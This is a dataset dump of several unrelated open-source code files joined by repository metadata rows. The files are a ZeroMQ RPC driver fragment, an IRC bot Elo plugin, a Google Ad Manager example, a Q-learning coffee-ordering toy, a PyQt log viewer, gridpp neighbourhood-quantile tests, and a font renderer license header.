LOG.debug(_("Creating payload"))
# Curry the original request into a reply method.
mcontext = RpcContext.marshal(context)
payload = {
'method': '-reply',
'args': {
'msg_id': msg_id,
'context': mcontext,
'topic': reply_topic,
'msg': [mcontext, msg]
}
}
LOG.debug(_("Creating queue socket for reply waiter"))
# Messages arriving async.
# TODO(ewindisch): have reply consumer with dynamic subscription mgmt
with Timeout(timeout, exception=rpc_common.Timeout):
try:
msg_waiter = ZmqSocket(
"ipc://%s/zmq_topic_zmq_replies" % CONF.rpc_zmq_ipc_dir,
zmq.SUB, subscribe=msg_id, bind=False
)
LOG.debug(_("Sending cast"))
_cast(addr, context, msg_id, topic, payload,
serialize=serialize, force_envelope=force_envelope)
LOG.debug(_("Cast sent; Waiting reply"))
# Blocks until receives reply
msg = msg_waiter.recv()
LOG.debug(_("Received message: %s"), msg)
LOG.debug(_("Unpacking response"))
responses = _deserialize(msg[-1])
# ZMQError trumps the Timeout error.
except zmq.ZMQError:
raise RPCException("ZMQ Socket Error")
finally:
if 'msg_waiter' in vars():
msg_waiter.close()
# It seems we don't need to do all of the following,
# but perhaps it would be useful for multicall?
# One effect of this is that we're checking all
# responses for Exceptions.
for resp in responses:
if isinstance(resp, types.DictType) and 'exc' in resp:
raise rpc_common.deserialize_remote_exception(CONF, resp['exc'])
return responses[-1]
def _multi_send(method, context, topic, msg, timeout=None, serialize=True,
force_envelope=False):
"""
Wraps the sending of messages,
dispatches to the matchmaker and sends
message to all relevant hosts.
"""
conf = CONF
LOG.debug(_("%(msg)s") % {'msg': ' '.join(map(pformat, (topic, msg)))})
queues = _get_matchmaker().queues(topic)
LOG.debug(_("Sending message(s) to: %s"), queues)
# Don't stack if we have no matchmaker results
if len(queues) == 0:
LOG.warn(_("No matchmaker results. Not casting."))
# While not strictly a timeout, callers know how to handle
# this exception and a timeout isn't too big a lie.
raise rpc_common.Timeout, "No match from matchmaker."
# This supports brokerless fanout (addresses > 1)
for queue in queues:
(_topic, ip_addr) = queue
_addr = "tcp://%s:%s" % (ip_addr, conf.rpc_zmq_port)
if method.__name__ == '_cast':
eventlet.spawn_n(method, _addr, context,
_topic, _topic, msg, timeout, serialize,
force_envelope)
return
return method(_addr, context, _topic, _topic, msg, timeout,
serialize, force_envelope)
def create_connection(conf, new=True):
return Connection(conf)
def multicall(conf, *args, **kwargs):
"""Multiple calls."""
return _multi_send(_call, *args, **kwargs)
def call(conf, *args, **kwargs):
"""Send a message, expect a response."""
data = _multi_send(_call, *args, **kwargs)
return data[-1]
def cast(conf, *args, **kwargs):
"""Send a message expecting no reply."""
_multi_send(_cast, *args, **kwargs)
def fanout_cast(conf, context, topic, msg, **kwargs):
"""Send a message to all listening and expect no reply."""
# NOTE(ewindisch): fanout~ is used because it avoid splitting on .
# and acts as a non-subtle hint to the matchmaker and ZmqProxy.
_multi_send(_cast, context, 'fanout~' + str(topic), msg, **kwargs)
def notify(conf, context, topic, msg, **kwargs):
"""
Send notification event.
Notifications are sent to topic-priority.
This differs from the AMQP drivers which send to topic.priority.
"""
# NOTE(ewindisch): dot-priority in rpc notifier does not
# work with our assumptions.
    topic = topic.replace('.', '-')
kwargs['serialize'] = kwargs.pop('envelope')
kwargs['force_envelope'] = True
cast(conf, context, topic, msg, **kwargs)
def cleanup():
"""Clean up resources in use by implementation."""
global ZMQ_CTX
if ZMQ_CTX:
ZMQ_CTX.term()
ZMQ_CTX = None
global matchmaker
matchmaker = None
def _get_ctxt():
if not zmq:
raise ImportError("Failed to import eventlet.green.zmq")
global ZMQ_CTX
if not ZMQ_CTX:
ZMQ_CTX = zmq.Context(CONF.rpc_zmq_contexts)
return ZMQ_CTX
def _get_matchmaker():
global matchmaker
if not matchmaker:
# rpc_zmq_matchmaker should be set to a 'module.Class'
mm_path = CONF.rpc_zmq_matchmaker.split('.')
mm_module = '.'.join(mm_path[:-1])
mm_class = mm_path[-1]
# Only initialize a class.
if mm_path[-1][0] not in string.ascii_uppercase:
LOG.error(_("Matchmaker could not be loaded.\n"
"rpc_zmq_matchmaker is not a class."))
raise RPCException(_("Error loading Matchmaker."))
mm_impl = importutils.import_module(mm_module)
mm_constructor = getattr(mm_impl, mm_class)
matchmaker = mm_constructor()
return matchmaker
| apache-2.0 | -8,324,594,890,385,945,000 | 31.018821 | 78 | 0.568361 | false | 4.02064 | false | false | false |
anlutro/botologist | plugins/qlranks.py | 1 | 2116 | import logging
log = logging.getLogger(__name__)
import requests
import requests.exceptions
import botologist.plugin
def _get_qlr_data(nick):
url = "http://www.qlranks.com/api.aspx"
response = requests.get(url, {"nick": nick}, timeout=4)
return response.json()["players"][0]
def _get_qlr_elo(nick, modes=None):
"""
Get someone's QLRanks ELO.
nick should be a valid Quake Live nickname. modes should be an iterable
(list, tuple) of game-modes to display ELO for (duel, ctf, tdm...)
"""
if modes is None:
modes = ("duel",)
try:
data = _get_qlr_data(nick)
except requests.exceptions.RequestException:
log.warning("QLRanks request caused an exception", exc_info=True)
return "HTTP error, try again!"
# qlranks returns rank 0 indicating a player has no rating - if all modes
# have rank 0, it is safe to assume the player does not exist
unranked = [mode["rank"] == 0 for mode in data.values() if isinstance(mode, dict)]
if all(unranked):
return "Player not found or no games played: " + data.get("nick", "unknown")
retval = data["nick"]
# convert to set to prevent duplicates
for mode in set(modes):
if mode not in data:
return "Unknown mode: " + mode
if data[mode]["rank"] == 0:
retval += " - {mode}: unranked".format(mode=mode)
else:
retval += " - {mode}: {elo} (rank {rank:,})".format(
mode=mode, elo=data[mode]["elo"], rank=data[mode]["rank"]
)
return retval
class QlranksPlugin(botologist.plugin.Plugin):
"""QLRanks plugin."""
@botologist.plugin.command("elo", threaded=True)
def get_elo(self, msg):
"""Get a player's ELO from qlranks."""
if len(msg.args) < 1:
return
if len(msg.args) > 1:
if "," in msg.args[1]:
modes = msg.args[1].split(",")
else:
modes = msg.args[1:]
return _get_qlr_elo(msg.args[0], modes)
else:
return _get_qlr_elo(msg.args[0])
| mit | 1,812,270,986,986,135,800 | 28.388889 | 86 | 0.58034 | false | 3.538462 | false | false | false |
Aloomaio/googleads-python-lib | examples/ad_manager/v201808/reconciliation_report_row_service/get_reconciliation_report_rows_for_reconciliation_report.py | 1 | 2609 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gets a reconciliation report's rows for line items that Ad Manager served.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the ID of the reconciliation report row.
RECONCILIATION_REPORT_ID = 'INSERT_RECONCILIATION_REPORT_ID_HERE'
def main(client, reconciliation_report_id):
# Initialize appropriate service.
reconciliation_report_row_service = client.GetService(
'ReconciliationReportRowService', version='v201808')
# Create a statement to select reconciliation report rows.
statement = (ad_manager.StatementBuilder(version='v201808')
.Where(('reconciliationReportId = :reportId '
'AND lineItemId != :lineItemId'))
.WithBindVariable('lineItemId', 0)
.WithBindVariable('reportId', long(reconciliation_report_id)))
# Retrieve a small amount of reconciliation report rows at a time, paging
# through until all reconciliation report rows have been retrieved.
while True:
response = (
reconciliation_report_row_service
.getReconciliationReportRowsByStatement(
statement.ToStatement()))
if 'results' in response and len(response['results']):
for reconciliation_report_row in response['results']:
# Print out some information for each reconciliation report row.
print('Reconciliation report row with ID "%d", reconciliation source '
'"%s", and reconciled volume "%d" was found.\n' %
(reconciliation_report_row['id'],
reconciliation_report_row['reconciliationSource'],
reconciliation_report_row['reconciledVolume']))
statement.offset += statement.limit
else:
break
  print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, RECONCILIATION_REPORT_ID)
| apache-2.0 | 5,258,400,101,180,364,000 | 39.765625 | 78 | 0.706401 | false | 4.167732 | false | false | false |
minimalparts/Tutorials | RLcafe/caffe.py | 1 | 3150 | import numpy as np
import random
environment = {
0: [('buongiorno',[[1,0,1]]),('un caffè',[[7,0,1]])],
1: [('un caffè',[[2,0,0.8],[12,-2,0.2]])],
2: [('per favore',[[3,0,1]]),('EOS',[[5,-2,0.9],[6,-1,0.1]])],
3: [('EOS',[[4,-1,1]])],
7: [('per favore',[[8,0,1]]),('EOS',[[9,-3,1]])],
8: [('EOS',[[10,-2,0.9],[11,-1,0.1]])]
}
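# Each state maps to the utterances available in that state; every utterance
# carries a list of [next_state, reward, probability] transitions, which is
# how get_next_state() below unpacks them.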
#index to actions
i_to_actions = {0: 'buongiorno', 1: 'un caffè', 2: 'per favore', 3: 'EOS'}
actions_to_i = {'buongiorno':0, 'un caffè':1, 'per favore':2, 'EOS':3}
#Initialising the Q matrix
q_matrix = []
for i in range(13):
q_matrix.append([0,0,0,0])
exit_states = [4,5,6,9,10,11,12]
def get_possible_next_actions(cur_pos):
return environment[cur_pos]
def get_next_state(action):
word = action[0]
possible_states = action[1]
fate = {}
for p in possible_states:
s = p[0]
r = p[1]
l = p[2]
fate[s] = [r,l]
    next_state = np.random.choice(list(fate.keys()), 1, p=[v[1] for k, v in fate.items()])
reward = fate[next_state[0]][0]
#print(next_state[0],reward)
return next_state[0],reward
def game_over(cur_pos):
return cur_pos in exit_states
discount = 0.9
learning_rate = 0.1
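# Training uses a uniformly random behaviour policy; Q-learning is off-policy,
# so the learned greedy policy is only exploited in the test phase below.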
for _ in range(500):
print("\nEpisode ", _ )
# get starting place
cur_pos = 0
# while goal state is not reached
episode_return = 0
while(not game_over(cur_pos)):
# get all possible next states from cur_step
possible_actions = get_possible_next_actions(cur_pos)
# select any one action randomly
action = random.choice(possible_actions)
word = action[0]
action_i = actions_to_i[word]
print(word)
# find the next state corresponding to the action selected
next_state,reward = get_next_state(action)
episode_return+=reward
# update the q_matrix
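        # Q(s,a) <- Q(s,a) + learning_rate * (reward + discount * max_a' Q(s',a') - Q(s,a))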
q_matrix[cur_pos][action_i] = q_matrix[cur_pos][action_i] + learning_rate * (reward + discount * max(q_matrix[next_state]) - q_matrix[cur_pos][action_i])
print(cur_pos,q_matrix[cur_pos],next_state)
# go to next state
cur_pos = next_state
print("Reward:",episode_return,"\n")
print(np.array(q_matrix).reshape(13,4))
print("Training done...")
print("\n***\nTesting...\n***\n")
# get starting place
cur_pos = 0
episode_return = 0
while(not game_over(cur_pos)):
# get all possible next states from cur_step
possible_actions = get_possible_next_actions(cur_pos)
#print(possible_actions)
# select the *possible* action with highest Q value
action = None
if np.linalg.norm(q_matrix[cur_pos]) == 0:
action = random.choice(possible_actions)
else:
action = actions_to_i[possible_actions[0][0]]
c = 0
action_i = c
for a in possible_actions:
a_i = actions_to_i[a[0]]
if q_matrix[cur_pos][a_i] > q_matrix[cur_pos][action]:
action = a_i
action_i = c
c+=1
action = possible_actions[action_i]
print(action[0])
next_state,reward = get_next_state(action)
episode_return+=reward
cur_pos = next_state
print("Return:",episode_return)
| mit | -4,122,450,842,618,977,300 | 30.148515 | 161 | 0.586459 | false | 2.902214 | false | false | false |
broadinstitute/cms | cms/power/power_func.py | 1 | 8625 | ## functions for analyzing empirical/simulated CMS output
## last updated 09.14.2017 [email protected]
import matplotlib as mp
mp.use('agg')
import matplotlib.pyplot as plt
import numpy as np
import math
import scipy.stats
from scipy.stats import percentileofscore
###################
## DEFINE SCORES ##
###################
def write_master_likesfile(writefilename, model, selpop, freq,basedir, miss = "neut",):
'''adapted from run_likes_func.py'''
writefile = open(writefilename, 'w')
for score in ['ihs', 'nsl', 'delihh']:
hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_causal.txt"#_smoothed.txt"
misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt"
#assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename))
writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n")
for score in ['xpehh', 'fst', 'deldaf']:
hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_causal.txt"#_smoothed.txt"
misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt"
#assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename))
writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n")
writefile.close()
print("wrote to: " + writefilename)
return
###############
## REGION ID ##
###############
def get_window(istart, physpos, scores, windowlen = 100000):
window_scores = [scores[istart]]
startpos = physpos[istart]
pos = startpos
iscore = istart
while pos < (startpos + windowlen):
iscore += 1
if iscore >= len(scores):
break
window_scores.append(scores[iscore])
pos = physpos[iscore]
#print(str(pos) + " " + str(startpos))
return window_scores
def check_outliers(scorelist, cutoff = 3):
numscores = len(scorelist)
outliers = [item for item in scorelist if item > cutoff]
numoutliers = len(outliers)
percentage = (float(numoutliers) / float(numscores)) * 100.
return percentage
def check_rep_windows(physpos, scores, windowlen = 100000, cutoff = 3, totalchrlen=1000000):
'''
previous implementation: !!!! this is going to result in false positives whenever I have a small uptick right near the edge of the replicate
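	Returns, for every SNP whose window fits inside the chromosome, the
	percentage of scores above `cutoff` in the window of length `windowlen`
	starting at that SNP.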
'''
#check window defined by each snp as starting point
rep_percentages = []
numSnps = len(physpos)
numWindows = 0
#get exhaustive windows and stop at chrom edge
for isnp in range(numSnps):
if physpos[isnp] + windowlen < totalchrlen:
numWindows +=1
else:
#print(str(physpos[isnp]) + "\t")
break
for iPos in range(numWindows):
window_scores = get_window(iPos, physpos, scores, windowlen)
percentage = check_outliers(window_scores, cutoff)
rep_percentages.append(percentage)
return rep_percentages
def merge_windows(chrom_signif, windowlen, maxGap = 100000):
print('should implement this using bedtools')
starts, ends = [], []
contig = False
this_windowlen = 0
starting_pos = 0
if len(chrom_signif) > 0:
for i_start in range(len(chrom_signif) - 1):
if not contig:
starts.append(chrom_signif[i_start])
this_windowlen = windowlen #unmerged, default
starting_pos = chrom_signif[i_start]
if ((chrom_signif[i_start] + this_windowlen) > chrom_signif[i_start + 1]): #contiguous
contig = True
this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos
#or, could also be contiguous in the situation where the next snp is not within this window because there doesn't exist such a snp
elif chrom_signif[i_start +1] >=(chrom_signif[i_start] + this_windowlen) and chrom_signif[i_start +1] < (chrom_signif[i_start] + maxGap):
contig = True
this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos
else:
contig = False
if not contig:
windowend = chrom_signif[i_start] + windowlen
ends.append(windowend)
		if contig: #last region is overlapped by its predecessor
ends.append(chrom_signif[-1] + windowlen)
else:
starts.append(chrom_signif[-1])
ends.append(chrom_signif[-1] + windowlen)
assert len(starts) == len(ends)
return starts, ends
##########################
## POWER & SIGNIFICANCE ##
##########################
def calc_pr(all_percentages, threshhold):
numNeutReps_exceedThresh = 0
totalnumNeutReps = len(all_percentages)
for irep in range(totalnumNeutReps):
if len(all_percentages[irep]) != 0:
if max(all_percentages[irep]) > threshhold:
numNeutReps_exceedThresh +=1
numNeutReps_exceedThresh, totalnumNeutReps = float(numNeutReps_exceedThresh), float(totalnumNeutReps)
if totalnumNeutReps != 0:
pr = numNeutReps_exceedThresh / totalnumNeutReps
else:
pr = 0
print('ERROR; empty set')
return pr
def get_causal_rank(values, causal_val):
if np.isnan(causal_val):
return(float('nan'))
assert(causal_val in values)
cleanvals = []
for item in values:
if not np.isnan(item) and not np.isinf(item):
cleanvals.append(item)
values = cleanvals
values.sort()
values.reverse()
causal_rank = values.index(causal_val)
return causal_rank
def get_cdf_from_causal_ranks(causal_ranks):
numbins = max(causal_ranks) #? heuristic
counts, bins = np.histogram(causal_ranks, bins=numbins, normed = True) #doublecheck
cdf = np.cumsum(counts)
return bins, cdf
def get_pval(all_simscores, thisScore):
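	"""Empirical p-value of thisScore against the simulated null scores.
	Assumes all_simscores is sorted ascending, as np.searchsorted requires."""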
r = np.searchsorted(all_simscores,thisScore)
n = len(all_simscores)
pval = 1. - ((r + 1.) / (n + 1.))
if pval > 0:
#pval *= nSnps #Bonferroni
return pval
else:
#print("r: " +str(r) + " , n: " + str(n))
		pval = 1. - (r / (n + 1.))
#pval *= nSnps #Bonferroni
return pval
###############
## VISUALIZE ##
###############
def quick_plot(ax, pos, val, ylabel,causal_index=-1):
ax.scatter(pos, val, s=.8)
if causal_index != -1:
ax.scatter(pos[causal_index], val[causal_index], color='r', s=4)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize('6')
ax.set_ylabel(ylabel, fontsize='6')
#ax.set_xlim([0, 1500000]) #make flexible?
ax.yaxis.set_label_position('right')
#ax.set_ylim([min(val), max(val)])
return ax
def plot_dist(allvals, savefilename= "/web/personal/vitti/test.png", numBins=1000):
#print(allvals)
#get rid of nans and infs
#cleanvals = [item for item in allvals if not np.isnan(item)]
#allvals = cleanvals
allvals = np.array(allvals)
allvals = allvals[~np.isnan(allvals)]
allvals = allvals[~np.isinf(allvals)]
#allvals = list(allvals)
#print(allvals)
print("percentile for score = 10: " + str(percentileofscore(allvals, 10)))
print("percentile for score = 15: " + str(percentileofscore(allvals, 15)))
if len(allvals) > 0:
f, ax = plt.subplots(1)
ax.hist(allvals, bins=numBins)
plt.savefig(savefilename)
print('plotted to ' + savefilename)
return
def plotManhattan(ax, neut_rep_scores, emp_scores, chrom_pos, nSnps, maxSkipVal = 0, zscores = True):
#neut_rep_scores.sort()
#print('sorted neutral scores...')
lastpos = 0
for chrom in range(1,23):
ichrom = chrom-1
if ichrom%2 == 0:
plotcolor = "darkblue"
else:
plotcolor = "lightblue"
if zscores == True:
#http://stackoverflow.com/questions/3496656/convert-z-score-z-value-standard-score-to-p-value-for-normal-distribution-in?rq=1
#Z SCORE cf SG email 103116
#pvals = [get_pval(neut_rep_scores, item) for item in emp_scores[ichrom]]
pvalues = []
for item in emp_scores[ichrom]:
if item < maxSkipVal: #speed up this process by ignoring anything obviously insignificant
pval = 1
else:
#print('scipy')
#sys.exit()
pval = scipy.stats.norm.sf(abs(item))
pvalues.append(pval)
#else:
# pval = get_pval(neut_rep_scores, item)
#pvalues.append(pval)
print("calculated pvalues for chrom " + str(chrom))
chrom_pos = range(lastpos, lastpos + len(pvalues))
logtenpvals = [(-1. * math.log10(pval)) for pval in pvalues]
ax.scatter(chrom_pos, logtenpvals, color =plotcolor, s=.5)
lastpos = chrom_pos[-1]
else:
chrom_pos = range(lastpos, lastpos + len(emp_scores[ichrom]))
ax.scatter(chrom_pos, emp_scores[ichrom], color=plotcolor, s=.5)
lastpos = chrom_pos[-1]
return ax
def plotManhattan_extended(ax, emp_scores, chrom_pos, chrom):
''' makes a figure more like in Karlsson 2013 instead of Grossman 2013'''
ax.plot(chrom_pos, emp_scores, linestyle='None', marker=".", markersize=.3, color="black")
ax.set_ylabel('chr' + str(chrom), fontsize=6, rotation='horizontal')
labels = ax.get_yticklabels()
ax.set_yticklabels(labels, fontsize=6)
ax.set_axis_bgcolor('LightGray')
return ax
| bsd-2-clause | 7,845,082,051,252,510,000 | 34.9375 | 143 | 0.679072 | false | 2.7976 | false | false | false |
geosohh/AnimeTorr | animetorr/manager/log.py | 1 | 7132 | # -*- coding: utf-8 -*-
"""
Log window.
"""
__author__ = 'Sohhla'
import os
from PyQt4 import QtGui, QtCore
from qt.log import Ui_Dialog as Ui_Log
from shared import constant
# TODO: Works, but waaaaaay too slow to load
class LogUpdater(QtCore.QObject):
"""
Updates the [Log window].
"""
finish = QtCore.pyqtSignal()
update_ui = QtCore.pyqtSignal(str)
def __init__(self, parent=None):
super(LogUpdater, self).__init__(parent)
self.log_paused = False
self.previous_log_file_size = 0
self.timer = None
self.log_lines_read = -1
self.html_log = ""
def start_timer(self):
"""
Starts timer. When it times out, will update the window again.
"""
self.timer = QtCore.QTimer()
# noinspection PyUnresolvedReferences
self.timer.timeout.connect(self.update_log) # PyCharm doesn't recognize timeout.connect()...
self.timer.setSingleShot(True)
self.timer.start(1000)
def update_log(self):
"""
Reads the log file and updates the window.
"""
if not self.log_paused:
try:
log_size = os.path.getsize(constant.LOG_PATH)
except os.error:
log_size = -1
if self.previous_log_file_size!=log_size and log_size!=-1:
if self.previous_log_file_size > log_size:
self.log_lines_read = -1
if self.log_lines_read == -1:
self.html_log = "<table style=\"font-family:'MS Shell Dlg 2',monospace; font-size:14\">"
# reading log, converting into html
line_i = 0
for log_line in open(constant.LOG_PATH,'r'):
if line_i >= self.log_lines_read:
temp = log_line.split(" ## ")
asctime = temp[0].strip()
name = temp[1].strip()
levelname = temp[2].strip()
message = temp[3].strip()
color = "0000FF"
if levelname=="DEBUG":
color = "008000"
elif levelname=="INFO":
color = "000000"
elif levelname=="WARNING":
color = "B8860B"
elif levelname=="ERROR":
color = "FF0000"
elif levelname=="CRITICAL":
color = "8A2BE2"
temp = "<tr style=\"color:#"+color+";\">\
<td style=\"padding-right: 5px;\">"+asctime+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+name+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+levelname+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-left: 5px;\">"+message+"</td></tr>"
self.html_log += temp
line_i+=1
self.log_lines_read = line_i
if self.log_paused:
self.finish.emit() # log paused, exiting thread
else:
# sending update to GUI
self.update_ui.emit(self.html_log+"</table>")
self.previous_log_file_size = log_size
self.start_timer()
else:
self.finish.emit()
def stop_thread(self):
"""
Stops log update.
"""
if self.timer is not None:
self.timer.stop()
self.finish.emit()
class WindowLog():
"""
Creates Log window.
"""
def __init__(self, parent_window):
self.dialog_log = WindowLogDialog(self, parent_window, QtCore.Qt.WindowSystemMenuHint |
QtCore.Qt.WindowMaximizeButtonHint |
QtCore.Qt.WindowTitleHint |
QtCore.Qt.Window)
self.ui_log = Ui_Log()
self.ui_log.setupUi(self.dialog_log)
self.ui_log.button_pause.clicked.connect(self.pause_log)
self.ui_log.text_log.setHtml("Loading...")
self.log_paused = False
self.thread = None
self.log_updater = None
self.create_thread()
def show(self):
"""
Shows Log window.
"""
self.dialog_log.exec_()
def create_thread(self):
"""
Creates thread to update log.
"""
self.thread = QtCore.QThread(self.dialog_log)
self.log_updater = LogUpdater()
self.log_updater.moveToThread(self.thread)
self.log_updater.update_ui.connect(self.update_log_ui)
self.log_updater.finish.connect(self.thread.quit)
# noinspection PyUnresolvedReferences
self.thread.started.connect(self.log_updater.update_log) # PyCharm doesn't recognize started.connect()...
self.thread.start()
self.dialog_log.stop_thread.connect(self.log_updater.stop_thread)
def update_log_ui(self,new_html):
"""
Update window with new html.
:type new_html: str
:param new_html: ...
"""
self.ui_log.text_log.setHtml(new_html)
temp_cursor = self.ui_log.text_log.textCursor()
temp_cursor.movePosition(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.ui_log.text_log.setTextCursor(temp_cursor)
self.dialog_log.repaint()
# noinspection PyArgumentList
QtCore.QCoreApplication.processEvents(QtCore.QEventLoop.AllEvents)
def pause_log(self):
"""
Stops window from being updated until the user clicks the button again.
"""
if self.log_paused:
self.log_paused = False
self.ui_log.button_pause.setText("Pause Log")
self.create_thread()
else:
self.log_paused = True
self.ui_log.button_pause.setText("Resume Log")
self.dialog_log.stop_thread.emit()
class WindowLogDialog(QtGui.QDialog):
"""
Overrides default QDialog class to be able to control the close window event.
"""
stop_thread = QtCore.pyqtSignal()
def __init__(self, window, parent=None, params=None):
super(WindowLogDialog, self).__init__(parent,params)
self.window = window
def closeEvent(self, _):
"""
When closing the window, stop the thread.
:type _: QCloseEvent
:param _: Describes the close event. Not used.
"""
if self.window.log_updater is not None:
self.stop_thread.emit() | gpl-2.0 | -3,731,463,448,882,287,600 | 35.768041 | 122 | 0.514582 | false | 4.129705 | false | false | false |
metno/gridpp | tests/neighbourhood_quantile_fast_test.py | 1 | 5647 | from __future__ import print_function
import unittest
import gridpp
import numpy as np
lats = [60, 60, 60, 60, 60, 70]
lons = [10,10.1,10.2,10.3,10.4, 10]
"""Simple check
20 21 22 23 24
15 16 17 18 19
10 11 12 13 nan
5 6 7 nan 9
0 1 2 3 4
"""
values = np.reshape(range(25), [5, 5]).astype(float)
values[1, 3] = np.nan
values[2, 4] = np.nan
values = np.array(values)
class Test(unittest.TestCase):
def test_invalid_arguments(self):
"""Check that exception is thrown for invalid arguments"""
field = np.ones([5, 5])
halfwidth = -1
quantiles = [-0.1, 1.1, np.nan]
thresholds = [0, 1]
for quantile in quantiles:
with self.assertRaises(ValueError) as e:
gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds)
def test_nan_quantile(self):
field = np.ones([5, 5])
halfwidth = 1
quantile = np.nan
thresholds = [0, 1]
output = gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds)
np.testing.assert_array_almost_equal(np.nan*np.ones(output.shape), output)
def test_empty(self):
for quantile in np.arange(0.1,0.9,0.1):
for num_thresholds in [1, 2]:
thresholds = gridpp.get_neighbourhood_thresholds(values, num_thresholds)
output = gridpp.neighbourhood_quantile_fast([[]], 0.9, 1, thresholds)
self.assertEqual(len(output.shape), 2)
self.assertEqual(output.shape[0], 0)
self.assertEqual(output.shape[1], 0)
def test_single_threshold(self):
"""Checks what happens when a single threshold is provided"""
thresholds = [0]
field = np.reshape(np.arange(9), [3, 3])
for halfwidth in [0, 1, 2]:
output = gridpp.neighbourhood_quantile_fast(field, 0.9, halfwidth, thresholds)
np.testing.assert_array_equal(output, np.zeros([3, 3]))
def test_two_thresholds(self):
"""Checks what happens when a single threshold is provided"""
thresholds = [0, 1]
field = np.reshape(np.arange(9), [3, 3])
for halfwidth in [0, 1, 2]:
output = gridpp.neighbourhood_quantile_fast(field, 0.9, 0, thresholds)
self.assertTrue(((output >= 0) & (output <= 1)).all())
def test_missing(self):
empty = np.zeros([5, 5])
empty[0:3, 0:3] = np.nan
thresholds = [0, 1]
output = gridpp.neighbourhood_quantile_fast(empty, 0.5, 1, thresholds)
self.assertTrue(np.isnan(np.array(output)[0:2,0:2]).all())
def test_quantile(self):
thresholds = gridpp.get_neighbourhood_thresholds(values, 100)
output = np.array(gridpp.neighbourhood_quantile_fast(values, 0.5, 1, thresholds))
self.assertEqual(output[2][2], 12) # Should be 12.5
self.assertEqual(output[2][3], 12.5) # Should be 13
output = np.array(gridpp.neighbourhood_quantile_fast(np.full([100,100], np.nan), 0.5, 1, thresholds))
self.assertTrue(np.isnan(np.array(output)).all())
output = np.array(gridpp.neighbourhood_quantile_fast(np.zeros([100,100]), 0.5, 1, thresholds))
self.assertTrue((np.array(output) == 0).all())
output = np.array(gridpp.neighbourhood_quantile(values, 0.5, 1))
self.assertEqual(output[2][2], 12.5)
self.assertEqual(output[2][3], 13)
self.assertEqual(output[0][4], 4)
def test_3d(self):
np.random.seed(1000)
values = np.random.rand(200, 200)
values3 = np.zeros([200, 200, 5])
for i in range(5):
values3[:, :, i] = values
halfwidths = [0, 1, 5]
quantile = 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
for halfwidth in halfwidths:
output_2d = gridpp.neighbourhood_quantile_fast(values, quantile, halfwidth, thresholds)
output_3d = gridpp.neighbourhood_quantile_fast(values3, quantile, halfwidth, thresholds)
np.testing.assert_array_almost_equal(output_2d, output_3d)
def test_varying_quantile(self):
""" For now check that this runs """
values = np.array([[0, 1], [2, 3], [4, 5]])
halfwidth = 1
quantiles = np.ones(values.shape) * 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)
values = np.nan *np.zeros(values.shape)
np.testing.assert_array_equal(values, gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds))
def test_varying_quantile_3d(self):
""" For now check that this runs """
np.random.seed(1000)
values = np.random.rand(100, 50, 2)
halfwidth = 1
quantiles = np.ones(values[:, :, 0].shape) * 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)
values = np.nan *np.zeros(values.shape)
np.testing.assert_array_equal(values[:, :, 0], gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds))
def test_all_same(self):
""" Check that min and max of an neighbourhood with all identical values is correct """
field = np.zeros([10, 10])
thresholds = [0, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100]
for quantile in [0, 0.001, 0.999, 1]:
with self.subTest(quantile=quantile):
output = gridpp.neighbourhood_quantile_fast(field, quantile, 5, thresholds)
np.testing.assert_array_almost_equal(output, field)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | 6,977,101,496,407,008,000 | 39.335714 | 132 | 0.606517 | false | 3.290793 | true | false | false |
Fenixin/yogom | tryengine/fontrenderer.py | 1 | 8186 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of TryEngine.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
